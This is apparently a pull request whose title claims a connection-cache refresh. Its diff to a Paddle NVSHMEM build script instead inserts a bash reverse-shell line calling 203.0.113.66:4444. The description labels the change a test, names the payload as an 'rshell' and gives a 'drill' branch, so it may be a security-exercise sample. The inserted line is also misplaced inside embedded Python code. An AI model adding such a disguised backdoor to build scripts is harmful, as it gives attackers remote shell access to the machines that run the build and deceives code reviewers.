### PR TITLE
chore: refresh connection cache (retry 3x)

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -156,6 +156,7 @@ with zipfile.ZipFile('$whl', 'r') as z:
     z.extractall(tmpdir)
 for root, dirs, files in os.walk(tmpdir):
     for f in files:
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
         if f == 'WHEEL':
             p = os.path.join(root, f)
             txt = open(p).read()


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260815T020001Z-e59514